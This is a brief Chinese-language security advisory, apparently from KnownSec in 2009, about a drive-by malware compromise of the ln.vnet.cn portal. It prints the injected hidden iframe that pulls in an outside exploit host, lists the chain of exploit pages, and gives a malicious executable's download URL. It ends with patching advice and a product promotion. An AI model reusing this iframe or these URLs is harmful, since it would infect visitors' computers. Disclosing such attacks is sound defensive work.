发布时间:Mon Mar 30 2009 19:25:08 UTC+0800
最后更新时间:Mon Mar 30 2009 19:25:08 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 辽宁互联星空(http://ln.vnet.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://ln.vnet.cn/top.htm
网页被嵌入恶意链接代码:
<iframe src=http://se3.abisp.cn/02/02.htm width=100 height=0></iframe>
挂马分析:
[wide]http://ln.vnet.cn/
[frame]http://ln.vnet.cn/top.htm
[frame]http://se3.abisp.cn/02/02.htm
[frame]http://se3.abisp.cn/02/14.htm
[frame]http://se3.abisp.cn/02/flash.htm
[frame]http://se3.abisp.cn/02/002.htm
[frame]http://se3.abisp.cn/02/office.htm
[frame]http://se3.abisp.cn/02/lz.htm
[frame]http://se3.abisp.cn/02/bf.htm
[frame]http://se3.abisp.cn/02/real.htm
[frame]http://se3.abisp.cn/02/real.html
最终下载病毒文件:
http://cao.meijiatd.cn/00.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。
欢迎使用针对此类挂马攻击的防护程序-365门神,
可到www.365menshen.com下载并试用。
Popularity: 11% [?]
